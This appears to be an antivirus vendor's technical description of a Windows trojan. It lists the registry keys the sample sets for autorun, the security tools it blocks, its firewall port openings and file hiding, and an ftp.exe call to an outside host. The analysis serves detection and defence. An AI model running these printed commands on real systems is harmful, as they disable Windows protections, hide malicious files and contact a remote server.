Technical Information
To ensure autorun and distribution:
Modifies the following registry keys:
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] '' = '00000001'
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Microsoft' = '<SYSTEM32>\winlogon.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Microsoft_DNS' = '<SYSTEM32>\spool\drivers\svchost.exe'
Changes the following executable system files:
- %WINDIR%\NOTEPAD.EXE
- <SYSTEM32>\calc.exe
Malicious functions:
To complicate detection of its presence in the operating system,
forces the system hide from view:
- hidden files
- file extensions
blocks execution of the following system utilities:
- Windows Task Manager (Taskmgr)
- Registry Editor (RegEdit)
blocks the following features:
- System Restore (SR)
- Windows Security Center
Executes the following:
- '<SYSTEM32>\net.exe' stop "Firewall de Windows/Conexion compartida a Internet (ICS)"
- '<SYSTEM32>\netsh.exe' firewall add portopening TCP 21 "Service Filter DNS" ENABLE ALL
- '<SYSTEM32>\net1.exe' stop "Firewall de Windows/Conexion compartida a Internet (ICS)"
- '<SYSTEM32>\reg.exe' add "hkcu\software\microsoft\windows\currentVersion\policies\Explorer\RestricRun" /T REG_SZ /d "event.dll" /f
- '<SYSTEM32>\reg.exe' del "HKEY_CURRENT_USER\Control Panel\Sound" /f
- '<SYSTEM32>\net1.exe' stop "Centro de Seguridad"
- '<SYSTEM32>\reg.exe' delete "HKEY_CURRENT_USER\Control Panel\Centro de seguridad" /f
- '<SYSTEM32>\netsh.exe' firewall add portopening TCP 20 "Service DNS" ENABLE ALL
- '<SYSTEM32>\netsh.exe' firewall add portopening TCP 29003 "Service Firewall" ENABLE ALL
- '<SYSTEM32>\net.exe' stop "Centro de Seguridad"
- '<SYSTEM32>\reg.exe' delete "HKLM\SYSTEM\ControlSet001\Control\SafeBoot" /f
- '<SYSTEM32>\reg.exe' add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d "1" /f
- '<SYSTEM32>\attrib.exe' +s +h <SYSTEM32>\*.*
- '<SYSTEM32>\ftp.exe' -s:%WINDIR%\dat.txt ftp.webcindario.com
- '<SYSTEM32>\ping.exe' -n 60 0.0.0.0
- '<SYSTEM32>\attrib.exe' +h <SYSTEM32>\spool\drivers\svchost.exe
- '<SYSTEM32>\attrib.exe' +s +h <SYSTEM32>\AdvancedInstallers\*.*
- '<SYSTEM32>\reg.exe' add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Polices\Explorer" /v NoSaveSettings /T REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v logonprompt /t REG_SZ /d "kernel.dll" /f
- '<SYSTEM32>\reg.exe' add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explore" /v NoClose /t REG_DWORD /d "1" /f
- '<SYSTEM32>\attrib.exe' +s +h <SYSTEM32>\spool\drivers\*.*
- '<SYSTEM32>\attrib.exe' +s +h <DRIVERS>\*.*
- '<SYSTEM32>\reg.exe' add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableMsConfig /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft_DNS /t REG_SZ /d "<SYSTEM32>\spool\drivers\svchost.exe" /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /t REG_SZ /d "<SYSTEM32>\winlogon.exe" /f
- '<SYSTEM32>\reg.exe' add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFolderOptions /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Security Center" /v UACDisableNotify /t REG_DWORD /d "1" /f
- '<SYSTEM32>\attrib.exe' -s -h <DRIVERS>\etc\hosts
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\server.bat" "<Current directory>\""
- '<SYSTEM32>\reg.exe' add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d "0" /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t reg_dword /d "0" /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /ve /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' delete "HKCR\Directory\Background\shellex\ContextMenuHandlers\New" /
- '<SYSTEM32>\reg.exe' delete "HKEY_CURRENT_USER\Control Panel\Herramientas administrativas" /f
- '<SYSTEM32>\attrib.exe' +s +h <DRIVERS>\etc\hosts
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t REG_DWORD /d "2" /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL" /v CheckedValue /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d "0" /f
- '<SYSTEM32>\reg.exe' add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d "1" /f
Modifies settings of Windows Explorer:
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFolderOptions' = '00000001'
Modifies file system :
Creates the following files:
- <SYSTEM32>\WordPad.exe
- %WINDIR%\dat.txt
- %TEMP%\1.tmp\server.bat
- <SYSTEM32>\Dwm.exe
Sets the 'hidden' attribute to the following files:
- <SYSTEM32>\WordPad.exe
- <SYSTEM32>\Dwm.exe
Deletes the following files:
- <SYSTEM32>\Restore\srframe.mmf
- %WINDIR%\dat.txt
- <SYSTEM32>\Restore\srdiag.exe
- <SYSTEM32>\Restore\MachineGuid.txt
- <SYSTEM32>\Restore\rstrui.exe
Modifies the HOSTS file.
Network activity:
Connects to:
- 'localhost':1050
- 'localhost':1052
- 'localhost':1054
- 'ft#.##bcindario.com':21
- 'localhost':1046
- 'localhost':1048
UDP:
- DNS ASK ft#.##bcindario.com
